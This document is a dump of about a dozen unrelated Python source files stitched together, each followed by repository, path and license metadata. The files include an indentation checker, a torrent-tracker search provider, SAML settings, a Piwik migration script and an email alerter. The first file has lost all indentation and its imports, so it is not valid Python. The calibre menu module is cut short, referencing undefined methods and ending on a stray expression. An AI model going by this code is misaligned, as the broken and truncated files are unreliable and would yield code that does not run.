if not hasattr(tokenize, 'NL'):
raise ValueError("tokenize.NL doesn't exist -- tokenize module too old")
__all__ = ["check", "NannyNag", "process_tokens"]
verbose = 0
filename_only = 0
def errprint(*args):
sep = ""
for arg in args:
sys.stderr.write(sep + str(arg))
sep = " "
sys.stderr.write("\n")
def main():
global verbose, filename_only
try:
opts, args = getopt.getopt(sys.argv[1:], "qv")
except getopt.error, msg:
errprint(msg)
return
for o, a in opts:
if o == '-q':
filename_only = filename_only + 1
if o == '-v':
verbose = verbose + 1
if not args:
errprint("Usage:", sys.argv[0], "[-v] file_or_directory ...")
return
for arg in args:
check(arg)
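# Command-line sketch (editor's illustration): "python tabnanny.py -v DIR"
# recursively checks every .py file under DIR; -q prints only the names of
# offending files (see check() below).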
class NannyNag(Exception):
"""
Raised by tokeneater() if detecting an ambiguous indent.
Captured and handled in check().
"""
def __init__(self, lineno, msg, line):
self.lineno, self.msg, self.line = lineno, msg, line
def get_lineno(self):
return self.lineno
def get_msg(self):
return self.msg
def get_line(self):
return self.line
def check(file):
"""check(file_or_dir)
If file_or_dir is a directory and not a symbolic link, then recursively
descend the directory tree named by file_or_dir, checking all .py files
along the way. If file_or_dir is an ordinary Python source file, it is
checked for whitespace related problems. The diagnostic messages are
written to standard output using the print statement.
"""
if os.path.isdir(file) and not os.path.islink(file):
if verbose:
print "%r: listing directory" % (file,)
names = os.listdir(file)
for name in names:
fullname = os.path.join(file, name)
if (os.path.isdir(fullname) and
not os.path.islink(fullname) or
os.path.normcase(name[-3:]) == ".py"):
check(fullname)
return
try:
f = open(file)
except IOError, msg:
errprint("%r: I/O Error: %s" % (file, msg))
return
if verbose > 1:
print "checking %r ..." % file
try:
process_tokens(tokenize.generate_tokens(f.readline))
except tokenize.TokenError, msg:
errprint("%r: Token Error: %s" % (file, msg))
return
except IndentationError, msg:
errprint("%r: Indentation Error: %s" % (file, msg))
return
except NannyNag, nag:
badline = nag.get_lineno()
line = nag.get_line()
if verbose:
print "%r: *** Line %d: trouble in tab city! ***" % (file, badline)
print "offending line: %r" % (line,)
print nag.get_msg()
else:
if ' ' in file: file = '"' + file + '"'
if filename_only: print file
else: print file, badline, repr(line)
return
if verbose:
print "%r: Clean bill of health." % (file,)
class Whitespace:
# the characters used for space and tab
S, T = ' \t'
# members:
# raw
# the original string
# n
# the number of leading whitespace characters in raw
# nt
# the number of tabs in raw[:n]
# norm
# the normal form as a pair (count, trailing), where:
# count
# a tuple such that raw[:n] contains count[i]
# instances of S * i + T
# trailing
# the number of trailing spaces in raw[:n]
# It's A Theorem that m.indent_level(t) ==
# n.indent_level(t) for all t >= 1 iff m.norm == n.norm.
# is_simple
# true iff raw[:n] is of the form (T*)(S*)
def __init__(self, ws):
self.raw = ws
S, T = Whitespace.S, Whitespace.T
count = []
b = n = nt = 0
for ch in self.raw:
if ch == S:
n = n + 1
b = b + 1
elif ch == T:
n = n + 1
nt = nt + 1
if b >= len(count):
count = count + [0] * (b - len(count) + 1)
count[b] = count[b] + 1
b = 0
else:
break
self.n = n
self.nt = nt
self.norm = tuple(count), b
self.is_simple = len(count) <= 1
# return length of longest contiguous run of spaces (whether or not
# preceding a tab)
def longest_run_of_spaces(self):
count, trailing = self.norm
return max(len(count)-1, trailing)
def indent_level(self, tabsize):
# count, il = self.norm
# for i in range(len(count)):
# if count[i]:
# il = il + (i/tabsize + 1)*tabsize * count[i]
# return il
# quicker:
# il = trailing + sum (i/ts + 1)*ts*count[i] =
# trailing + ts * sum (i/ts + 1)*count[i] =
# trailing + ts * sum i/ts*count[i] + count[i] =
# trailing + ts * [(sum i/ts*count[i]) + (sum count[i])] =
# trailing + ts * [(sum i/ts*count[i]) + num_tabs]
# and note that i/ts*count[i] is 0 when i < ts
count, trailing = self.norm
il = 0
for i in range(tabsize, len(count)):
il = il + i/tabsize * count[i]
return trailing + tabsize * (il + self.nt)
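    # Worked example (editor's illustration): for raw == " \t \t ",
    # norm == ((0, 2), 1): two copies of "<space><tab>" plus one trailing
    # space.  With tabsize 8 each "<space><tab>" advances to the next tab
    # stop, so indent_level(8) == 1 + 8*(0 + 2) == 17.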
# return true iff self.indent_level(t) == other.indent_level(t)
# for all t >= 1
def equal(self, other):
return self.norm == other.norm
# return a list of tuples (ts, i1, i2) such that
# i1 == self.indent_level(ts) != other.indent_level(ts) == i2.
# Intended to be used after not self.equal(other) is known, in which
# case it will return at least one witnessing tab size.
def not_equal_witness(self, other):
n = max(self.longest_run_of_spaces(),
other.longest_run_of_spaces()) + 1
a = []
for ts in range(1, n+1):
if self.indent_level(ts) != other.indent_level(ts):
a.append( (ts,
self.indent_level(ts),
other.indent_level(ts)) )
return a
# Return True iff self.indent_level(t) < other.indent_level(t)
# for all t >= 1.
# The algorithm is due to Vincent Broman.
# Easy to prove it's correct.
# XXXpost that.
# Trivial to prove n is sharp (consider T vs ST).
# Unknown whether there's a faster general way. I suspected so at
# first, but no longer.
# For the special (but common!) case where M and N are both of the
# form (T*)(S*), M.less(N) iff M.len() < N.len() and
# M.num_tabs() <= N.num_tabs(). Proof is easy but kinda long-winded.
# XXXwrite that up.
# Note that M is of the form (T*)(S*) iff len(M.norm[0]) <= 1.
def less(self, other):
if self.n >= other.n:
return False
if self.is_simple and other.is_simple:
return self.nt <= other.nt
n = max(self.longest_run_of_spaces(),
other.longest_run_of_spaces()) + 1
# the self.n >= other.n test already did it for ts=1
for ts in range(2, n+1):
if self.indent_level(ts) >= other.indent_level(ts):
return False
return True
# return a list of tuples (ts, i1, i2) such that
# i1 == self.indent_level(ts) >= other.indent_level(ts) == i2.
# Intended to be used after not self.less(other) is known, in which
# case it will return at least one witnessing tab size.
def not_less_witness(self, other):
n = max(self.longest_run_of_spaces(),
other.longest_run_of_spaces()) + 1
a = []
for ts in range(1, n+1):
if self.indent_level(ts) >= other.indent_level(ts):
a.append( (ts,
self.indent_level(ts),
other.indent_level(ts)) )
return a
def format_witnesses(w):
firsts = map(lambda tup: str(tup[0]), w)
prefix = "at tab size"
if len(w) > 1:
prefix = prefix + "s"
return prefix + " " + ', '.join(firsts)
def process_tokens(tokens):
INDENT = tokenize.INDENT
DEDENT = tokenize.DEDENT
NEWLINE = tokenize.NEWLINE
JUNK = tokenize.COMMENT, tokenize.NL
indents = [Whitespace("")]
check_equal = 0
for (type, token, start, end, line) in tokens:
if type == NEWLINE:
# a program statement, or ENDMARKER, will eventually follow,
# after some (possibly empty) run of tokens of the form
# (NL | COMMENT)* (INDENT | DEDENT+)?
# If an INDENT appears, setting check_equal is wrong, and will
# be undone when we see the INDENT.
check_equal = 1
elif type == INDENT:
check_equal = 0
thisguy = Whitespace(token)
if not indents[-1].less(thisguy):
witness = indents[-1].not_less_witness(thisguy)
msg = "indent not greater e.g. " + format_witnesses(witness)
raise NannyNag(start[0], msg, line)
indents.append(thisguy)
elif type == DEDENT:
# there's nothing we need to check here! what's important is
# that when the run of DEDENTs ends, the indentation of the
# program statement (or ENDMARKER) that triggered the run is
# equal to what's left at the top of the indents stack
# Ouch! This assert triggers if the last line of the source
# is indented *and* lacks a newline -- then DEDENTs pop out
# of thin air.
# assert check_equal # else no earlier NEWLINE, or an earlier INDENT
check_equal = 1
del indents[-1]
elif check_equal and type not in JUNK:
# this is the first "real token" following a NEWLINE, so it
# must be the first token of the next program statement, or an
# ENDMARKER; the "line" argument exposes the leading whitespace
# for this statement; in the case of ENDMARKER, line is an empty
# string, so will properly match the empty string with which the
# "indents" stack was seeded
check_equal = 0
thisguy = Whitespace(line)
if not indents[-1].equal(thisguy):
witness = indents[-1].not_equal_witness(thisguy)
msg = "indent not equal e.g. " + format_witnesses(witness)
raise NannyNag(start[0], msg, line)
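# Illustrative driver (an assumption, not part of the original file): the
# checker can be fed straight from the tokenize module; NannyNag is assumed
# to carry the (lineno, msg, line) triple it is raised with above.
#
#   import tokenize
#   f = open('some_module.py')
#   try:
#       process_tokens(tokenize.generate_tokens(f.readline))
#   except NannyNag, nag:
#       print 'bad indentation:', nag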
if __name__ == '__main__':
main()
| apache-2.0 |
mvdbeek/tools-iuc | tools/gemini/test-data/util/shrink_simple_tab.py | 20 | 1807 | from __future__ import print_function
import argparse
from functools import partial
def keep_line(line, pos_cols, region):
fields = line.rstrip().split(b'\t')
if fields[pos_cols[0]] == region[0]: # same chromosome
if (
region[1] < int(fields[pos_cols[1]]) < region[2]
) or (
region[1] < int(fields[pos_cols[2]]) < region[2]
):
return True
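# Example (illustrative values): with pos_cols=[0, 1, 2] and
# region=(b'chr1', 100, 200), the line b'chr1\t150\t160\t...' is kept because
# its start coordinate falls strictly inside the region.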
def main(infile, ofile, num_header_lines):
print(infile, '->', ofile)
with open(infile, 'rb') as i:
with open(ofile, 'wb') as o:
# copy header lines
for c in range(num_header_lines):
o.write(next(i))
for line in i:
if keep_line(line):
o.write(line)
if __name__ == '__main__':
p = argparse.ArgumentParser()
p.add_argument('infile')
p.add_argument(
'-r', '--region',
required=True,
help='the region of the input file to rewrite'
)
p.add_argument(
'-o', '--ofile',
required=True,
help="the name of the output file"
)
p.add_argument(
'-c', '--cols',
nargs=3, type=int, required=True,
help="the columns of the input file specifying chrom, start and stop, "
"respectively"
)
p.add_argument(
'-n', '--num-header-lines',
type=int, default=0,
help='the number of header lines present in the input; These will '
'always be copied over to the new file.'
)
args = vars(p.parse_args())
chrom, reg = args['region'].split(':')
region = [chrom.encode()] + [int(x) for x in reg.split('-')]
keep_line = partial(keep_line, pos_cols=args['cols'], region=region)
main(args['infile'], args['ofile'], args['num_header_lines'])
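# Illustrative invocation (paths and coordinates are made up):
#   python shrink_simple_tab.py big.tsv -r chr1:1000-2000 -c 0 1 2 -n 1 -o small.tsv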
| mit |
pselle/calibre | src/calibre/gui2/dbus_export/menu2.py | 14 | 2317 | #!/usr/bin/env python2
# vim:fileencoding=utf-8
from __future__ import (unicode_literals, division, absolute_import,
print_function)
__license__ = 'GPL v3'
__copyright__ = '2014, Kovid Goyal <kovid at kovidgoyal.net>'
# An implementation of the GMenuModel export of menus/actions on DBus.
# GMenuModel is pretty bad, does not support icons, for instance, so I have not
# bothered to complete it. See gtk.py for an example app that creates a
# GMenuModel menu.
#
# Partial spec: https://wiki.gnome.org/Projects/GLib/GApplication/DBusAPI
import dbus
from PyQt5.Qt import QObject, pyqtSignal, QTimer, Qt
from calibre.utils.dbus_service import Object, method as dbus_method, signal as dbus_signal
from calibre.gui2.dbus_export.utils import set_X_window_properties
def add_window_properties_for_menu(widget, object_path, bus):
op = unicode(object_path)
set_X_window_properties(widget.effectiveWinId(), _UNITY_OBJECT_PATH=op, _GTK_UNIQUE_BUS_NAME=unicode(bus.get_unique_name()), _GTK_MENUBAR_OBJECT_PATH=op)
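# Illustrative wiring (main_window is an assumption, not from this file):
# export a menu object, then advertise its path on the window so the shell
# can find it.
#
#   bus = dbus.SessionBus()
#   menu = DBusMenu('/com/example/menus/menubar', bus=bus)
#   add_window_properties_for_menu(main_window, menu.object_path, bus)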
class DBusMenu(QObject):
handle_event_signal = pyqtSignal(object, object, object, object)
def __init__(self, object_path, parent=None, bus=None):
QObject.__init__(self, parent)
        # Unity barfs if the Event DBUS method does not return immediately, so
        # handle it asynchronously
self.handle_event_signal.connect(self.handle_event, type=Qt.QueuedConnection)
self.dbus_api = DBusMenuAPI(self, object_path, bus=bus)
self.set_status = self.dbus_api.set_status
self._next_id = 0
self.action_changed_timer = t = QTimer(self)
t.setInterval(0), t.setSingleShot(True), t.timeout.connect(self.actions_changed)
self.layout_changed_timer = t = QTimer(self)
t.setInterval(0), t.setSingleShot(True), t.timeout.connect(self.layouts_changed)
self.init_maps()
@property
def object_path(self):
return self.dbus_api._object_path
class DBusMenuAPI(Object):
ACTIONS_IFACE = 'org.gtk.Actions'
def __init__(self, menu, object_path, bus=None):
if bus is None:
bus = dbus.SessionBus()
Object.__init__(self, bus, object_path)
self.status = 'normal'
self.menu = menu
self.revision = 0
dbus_method, dbus_signal
| gpl-3.0 |
lmyrefelt/CouchPotatoServer | couchpotato/core/providers/torrent/iptorrents/main.py | 9 | 4032 | from bs4 import BeautifulSoup
from couchpotato.core.helpers.encoding import tryUrlencode
from couchpotato.core.helpers.variable import tryInt
from couchpotato.core.logger import CPLog
from couchpotato.core.providers.torrent.base import TorrentProvider
import traceback
log = CPLog(__name__)
class IPTorrents(TorrentProvider):
urls = {
'test' : 'http://www.iptorrents.com/',
'base_url' : 'http://www.iptorrents.com',
'login' : 'http://www.iptorrents.com/torrents/',
'login_check': 'http://www.iptorrents.com/inbox.php',
'search' : 'http://www.iptorrents.com/torrents/?l%d=1%s&q=%s&qf=ti&p=%d',
}
cat_ids = [
([48], ['720p', '1080p', 'bd50']),
([72], ['cam', 'ts', 'tc', 'r5', 'scr']),
([7], ['dvdrip', 'brrip']),
([6], ['dvdr']),
]
http_time_between_calls = 1 #seconds
cat_backup_id = None
def _searchOnTitle(self, title, movie, quality, results):
freeleech = '' if not self.conf('freeleech') else '&free=on'
pages = 1
current_page = 1
while current_page <= pages and not self.shuttingDown():
url = self.urls['search'] % (self.getCatId(quality['identifier'])[0], freeleech, tryUrlencode('%s %s' % (title.replace(':', ''), movie['library']['year'])), current_page)
data = self.getHTMLData(url, opener = self.login_opener)
if data:
html = BeautifulSoup(data)
try:
page_nav = html.find('span', attrs = {'class' : 'page_nav'})
if page_nav:
next_link = page_nav.find("a", text = "Next")
if next_link:
final_page_link = next_link.previous_sibling.previous_sibling
pages = int(final_page_link.string)
result_table = html.find('table', attrs = {'class' : 'torrents'})
if not result_table or 'nothing found!' in data.lower():
return
entries = result_table.find_all('tr')
for result in entries[1:]:
torrent = result.find_all('td')
if len(torrent) <= 1:
break
torrent = torrent[1].find('a')
torrent_id = torrent['href'].replace('/details.php?id=', '')
torrent_name = torrent.string
torrent_download_url = self.urls['base_url'] + (result.find_all('td')[3].find('a'))['href'].replace(' ', '.')
torrent_details_url = self.urls['base_url'] + torrent['href']
torrent_size = self.parseSize(result.find_all('td')[5].string)
torrent_seeders = tryInt(result.find('td', attrs = {'class' : 'ac t_seeders'}).string)
torrent_leechers = tryInt(result.find('td', attrs = {'class' : 'ac t_leechers'}).string)
results.append({
'id': torrent_id,
'name': torrent_name,
'url': torrent_download_url,
'detail_url': torrent_details_url,
'size': torrent_size,
'seeders': torrent_seeders,
'leechers': torrent_leechers,
})
except:
                    log.error('Failed parsing %s: %s', (self.getName(), traceback.format_exc()))
break
current_page += 1
def getLoginParams(self):
return tryUrlencode({
'username': self.conf('username'),
'password': self.conf('password'),
'login': 'submit',
})
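    # Illustrative form body produced above (credentials are placeholders,
    # field order may vary):
    #   username=alice&password=hunter2&login=submit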
def loginSuccess(self, output):
return 'don\'t have an account' not in output.lower()
def loginCheckSuccess(self, output):
return '/logout.php' in output.lower()
| gpl-3.0 |
miipl-naveen/optibizz | addons/account_check_writing/__openerp__.py | 313 | 1808 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Check Writing',
'version': '1.1',
'author': 'OpenERP SA, NovaPoint Group',
'category': 'Generic Modules/Accounting',
'description': """
Module for the Check Writing and Check Printing.
================================================
""",
'website': 'https://www.odoo.com/page/accounting',
'depends' : ['account_voucher'],
'data': [
'wizard/account_check_batch_printing_view.xml',
'account_view.xml',
'account_voucher_view.xml',
'account_check_writing_data.xml',
'data/report_paperformat.xml',
'views/report_check.xml',
'account_check_writing_report.xml',
],
'demo': ['account_demo.xml'],
'test': [],
'installable': True,
'active': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
hdinsight/hue | desktop/libs/libsaml/src/libsaml/conf.py | 25 | 4857 | #!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import subprocess
from django.utils.translation import ugettext_lazy as _t, ugettext as _
from desktop.lib.conf import Config, coerce_bool, coerce_csv
BASEDIR = os.path.dirname(os.path.abspath(__file__))
USERNAME_SOURCES = ('attributes', 'nameid')
def xmlsec():
"""
xmlsec path
"""
try:
proc = subprocess.Popen(['which', 'xmlsec1'], stdout=subprocess.PIPE)
return proc.stdout.read().strip()
except subprocess.CalledProcessError:
return '/usr/local/bin/xmlsec1'
def dict_list_map(value):
if isinstance(value, str):
d = {}
for k, v in json.loads(value).iteritems():
d[k] = (v,)
return d
elif isinstance(value, dict):
return value
return None
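# Example (illustrative): dict_list_map('{"uid": "username"}') returns
# {'uid': ('username',)}, i.e. each mapped attribute becomes a one-element
# tuple, matching the USER_ATTRIBUTE_MAPPING default further down.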
XMLSEC_BINARY = Config(
key="xmlsec_binary",
dynamic_default=xmlsec,
type=str,
help=_t("Xmlsec1 binary path. This program should be executable by the user running Hue."))
ENTITY_ID = Config(
key="entity_id",
default="<base_url>/saml2/metadata/",
type=str,
help=_t("Entity ID for Hue acting as service provider. Can also accept a pattern where '<base_url>' will be replaced with server URL base."))
CREATE_USERS_ON_LOGIN = Config(
key="create_users_on_login",
default=True,
type=coerce_bool,
help=_t("Create users from IdP on login."))
ATTRIBUTE_MAP_DIR = Config(
key="attribute_map_dir",
default=os.path.abspath( os.path.join(BASEDIR, '..', '..', 'attribute-maps') ),
type=str,
private=True,
help=_t("Attribute map directory contains files that map SAML attributes to pysaml2 attributes."))
ALLOW_UNSOLICITED = Config(
key="allow_unsolicited",
default=True,
type=coerce_bool,
private=True,
help=_t("Allow responses that are initiated by the IdP."))
REQUIRED_ATTRIBUTES = Config(
key="required_attributes",
default=['uid'],
type=coerce_csv,
help=_t("Required attributes to ask for from IdP."))
OPTIONAL_ATTRIBUTES = Config(
key="optional_attributes",
default=[],
type=coerce_csv,
help=_t("Optional attributes to ask for from IdP."))
METADATA_FILE = Config(
key="metadata_file",
default=os.path.abspath( os.path.join(BASEDIR, '..', '..', 'examples', 'idp.xml') ),
type=str,
help=_t("IdP metadata in the form of a file. This is generally an XML file containing metadata that the Identity Provider generates."))
KEY_FILE = Config(
key="key_file",
default="",
type=str,
help=_t("key_file is the name of a PEM formatted file that contains the private key of the Hue service. This is presently used both to encrypt/sign assertions and as client key in a HTTPS session."))
CERT_FILE = Config(
key="cert_file",
default="",
type=str,
help=_t("This is the public part of the service private/public key pair. cert_file must be a PEM formatted certificate chain file."))
USER_ATTRIBUTE_MAPPING = Config(
key="user_attribute_mapping",
default={'uid': ('username', )},
type=dict_list_map,
help=_t("A mapping from attributes in the response from the IdP to django user attributes."))
AUTHN_REQUESTS_SIGNED = Config(
key="authn_requests_signed",
default=False,
type=coerce_bool,
help=_t("Have Hue initiated authn requests be signed and provide a certificate."))
LOGOUT_REQUESTS_SIGNED = Config(
key="logout_requests_signed",
default=False,
type=coerce_bool,
help=_t("Have Hue initiated logout requests be signed and provide a certificate."))
USERNAME_SOURCE = Config(
key="username_source",
default="attributes",
type=str,
help=_t("Username can be sourced from 'attributes' or 'nameid'"))
LOGOUT_ENABLED = Config(
key="logout_enabled",
default=True,
type=coerce_bool,
help=_t("Performs the logout or not."))
NAME_ID_FORMAT = Config(
key="name_id_format",
default="urn:oasis:names:tc:SAML:2.0:nameid-format:persistent",
type=str,
help=_t("Request this NameID format from the server"))
def config_validator(user):
res = []
if USERNAME_SOURCE.get() not in USERNAME_SOURCES:
res.append(("libsaml.username_source", _("username_source not configured properly. SAML integration may not work.")))
return res
| apache-2.0 |
jeffreyliu3230/osf.io | scripts/migrate_piwik_base_nodes.py | 49 | 1670 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Update Piwik for nodes that were forked, registered or templated prior to
October 2014.
"""
import datetime
import logging
import sys
import time
from modularodm import Q
from framework.analytics.piwik import _update_node_object
from scripts import utils as scripts_utils
from website.app import init_app
from website.models import Node
logger = logging.getLogger('root')
def get_nodes():
forked = Q('__backrefs.forked.node.forked_from', 'ne', None)
registered = Q('__backrefs.registrations.node.registered_from', 'ne', None)
templated = Q('__backrefs.template_node.node.template_node', 'ne', None)
duplicate = (forked | registered | templated)
    # Combine with & (bitwise AND): a plain `and` would just return the
    # right-hand Q object and silently drop the duplicate filter.
    return Node.find(
        duplicate & Q('date_created', 'lt', datetime.datetime(2014, 10, 31))
    )
def main():
init_app('website.settings', set_backends=True, routes=False)
if 'dry' in sys.argv:
if 'list' in sys.argv:
logger.info('=== Nodes ===')
for node in get_nodes():
logger.info(node._id)
else:
logger.info('{} Nodes to be updated'.format(get_nodes().count()))
else:
# Log to a file
scripts_utils.add_file_logger(logger, __file__)
nodes = get_nodes()
logger.info('=== Updating {} Nodes ==='.format(nodes.count()))
for node in nodes:
# Wait a second between requests to reduce load on Piwik
time.sleep(1)
logger.info('Calling _update_node_objecton Node {}'.format(node._id))
_update_node_object(node)
logger.info('Finished')
if __name__ == "__main__":
main()
| apache-2.0 |
simonz05/django-notice | notice/views.py | 1 | 1542 | try:
import uwsgi
except ImportError:
pass
# raise ImportError('uWSGI is required to run this package')
from django.contrib.auth.decorators import login_required, user_passes_test
from django.contrib.auth.models import User
from django.http import HttpResponse
from django.template import RequestContext
from django.utils.encoding import force_unicode
from django.utils.functional import Promise
from django.views.decorators.http import condition
from simplejson import JSONEncoder
from backend import get_notices, add_notice
class LazyEncoder(JSONEncoder):
def default(self, obj):
if isinstance(obj, Promise):
return force_unicode(obj)
return obj
@user_passes_test(lambda u: u.is_superuser)
def add(request):
if request.method != 'POST':
return HttpResponse(content="", status=401)
notice = request.POST['notice']
try:
        pk = request.POST['user']
        user = User.objects.get(pk=pk)
except KeyError:
user = request.user
add_notice(user, notice)
return HttpResponse(
JSONEncoder().encode({'valid': True}),
mimetype='application/json')
@login_required
@condition(etag_func=None)
def get(request):
data = notice_listener(request.user, {})
resp = HttpResponse(data, mimetype='application/json')
resp['Transfer-Encoding'] = 'chunked'
return resp
def notice_listener(user, context, interval=1):
while True:
notices = get_notices(user)
if notices:
yield JSONEncoder().encode({'notices': notices})
            return  # end the generator cleanly instead of raising StopIteration
        yield ''
        uwsgi.green_pause(interval)
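# Illustrative client behaviour (an assumption; the URL is not defined in this
# file): a browser polls the chunked view above and renders each JSON payload,
#   GET /notice/get/  ->  {"notices": ["Deploy finished"]}
# The generator ends after the first non-empty batch, so the client reconnects.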
| bsd-3-clause |
dirkx/AccesSystem | lib-python/AlertEmail.py | 1 | 2771 | #!/usr/bin/env python3.4
#
import sys
import uuid
import smtplib
import time
import logging
from email.mime.text import MIMEText
from ACNode import ACNode
class AlertEmail(ACNode):
default_smtphost = 'localhost'
default_smtpport = 25
default_alertsubject = "[Node alert]"
default_alertfrom = 'acnode@unknown'
# Firstly - we have an 'offline' mode that allows for
# testing without the hardware (i.e. on any laptop or
# machine with python); without the need for the stepper
# motor, mosfet or RFID reader.
#
def parseArguments(self):
self.parser.add('--smtphost', action='store', default= self.default_smtphost,
help='SMTP host (default is '+self.default_smtphost+').')
self.parser.add('--smtpuser', action='store',
help='SMTP username (default is none)')
self.parser.add('--smtppasswd', action='store',
help='SMTP password (default is none)')
self.parser.add('--smtpport', action='store', default=self.default_smtpport,
help='SMTP host (default is '+str(self.default_smtpport)+').')
self.parser.add('--alertsubject', action='store', default=self.default_alertsubject,
help='Subject prefix alert emails (default is '+self.default_alertsubject+').')
self.parser.add('--alertfrom', action='store', default=self.default_alertfrom,
help='Sender of alert emails (default is '+self.default_alertfrom+').')
self.parser.add('--alertto', action='append',
help='Sender of alert emails (default is none). May be used multiple times.')
super().parseArguments()
def send_email(self,mailmsg,mailsubject, dst = None):
if not self.cnf.alertto:
self.logger.debug("No alert email sent - not configured.")
return
to = self.cnf.alertto
if dst:
to = dst
COMMASPACE = ', '
s = smtplib.SMTP(self.cnf.smtphost, self.cnf.smtpport)
if self.cnf.smtpuser and self.cnf.smtppasswd:
s.login(self.cnf.smtpuser, self.cnf.smtppasswd)
# s.sendmail(self.cnf.alertfrom, self.cnf.alertto, msg.as_string())
for st in to:
msg = MIMEText(mailmsg)
msg['Subject'] = self.cnf.alertsubject + ' ' + mailsubject
msg['From'] = 'ACNode ' + self.cnf.node + ' <' + self.cnf.alertfrom + '>'
msg['Message-ID'] = "{}-{}".format(str(uuid.uuid1()), self.cnf.alertfrom)
msg['To'] = st
s.send_message(msg)
s.quit()
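    # Illustrative calls (recipient address is a placeholder):
    #   node.send_email("Door sensor offline", "door alert")
    #   node.send_email("Ping", "test", dst=["ops@example.com"])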
if __name__ == "__main__":
    acnode = AlertEmail()
if not acnode:
sys.exit(1)
acnode.parseArguments()
acnode.setup()
if not acnode.cnf.alertto:
print("You did not specify an email destination. aborting test.")
sys.exit(1)
acnode.send_email("This is a test.", "test")
| apache-2.0 |
sss-freshbyte/blog | node_modules/node-gyp/gyp/pylib/gyp/xml_fix.py | 2767 | 2174 | # Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Applies a fix to CR LF TAB handling in xml.dom.
Fixes this: http://code.google.com/p/chromium/issues/detail?id=76293
Working around this: http://bugs.python.org/issue5752
TODO(bradnelson): Consider dropping this when we drop XP support.
"""
import xml.dom.minidom
def _Replacement_write_data(writer, data, is_attrib=False):
"""Writes datachars to writer."""
data = data.replace("&", "&").replace("<", "<")
data = data.replace("\"", """).replace(">", ">")
if is_attrib:
data = data.replace(
"\r", "
").replace(
"\n", "
").replace(
"\t", "	")
writer.write(data)
def _Replacement_writexml(self, writer, indent="", addindent="", newl=""):
# indent = current indentation
# addindent = indentation to add to higher levels
# newl = newline string
writer.write(indent+"<" + self.tagName)
attrs = self._get_attributes()
a_names = attrs.keys()
a_names.sort()
for a_name in a_names:
writer.write(" %s=\"" % a_name)
_Replacement_write_data(writer, attrs[a_name].value, is_attrib=True)
writer.write("\"")
if self.childNodes:
writer.write(">%s" % newl)
for node in self.childNodes:
node.writexml(writer, indent + addindent, addindent, newl)
writer.write("%s</%s>%s" % (indent, self.tagName, newl))
else:
writer.write("/>%s" % newl)
class XmlFix(object):
"""Object to manage temporary patching of xml.dom.minidom."""
def __init__(self):
# Preserve current xml.dom.minidom functions.
self.write_data = xml.dom.minidom._write_data
self.writexml = xml.dom.minidom.Element.writexml
# Inject replacement versions of a function and a method.
xml.dom.minidom._write_data = _Replacement_write_data
xml.dom.minidom.Element.writexml = _Replacement_writexml
def Cleanup(self):
if self.write_data:
xml.dom.minidom._write_data = self.write_data
xml.dom.minidom.Element.writexml = self.writexml
self.write_data = None
def __del__(self):
self.Cleanup()
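# Illustrative round trip (a sketch, not part of the original file): build a
# document through the DOM API so the tab reaches the serializer unmodified.
#
#   fix = XmlFix()
#   try:
#       doc = xml.dom.minidom.Document()
#       el = doc.createElement('a')
#       el.setAttribute('b', '1\t2')
#       doc.appendChild(el)
#       print doc.toxml()   # the tab is written as 	, not a literal tab
#   finally:
#       fix.Cleanup()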
| mit |
ChrisAntaki/phantomjs | src/qt/qtwebkit/Tools/Scripts/webkitpy/common/newstringio.py | 132 | 1757 | # Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""'with'-compliant StringIO implementation."""
import StringIO as OldStringIO
class StringIO(OldStringIO.StringIO):
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
pass
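# Illustrative usage (not part of the original):
#   with StringIO('payload') as stream:
#       print stream.read()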
| bsd-3-clause |
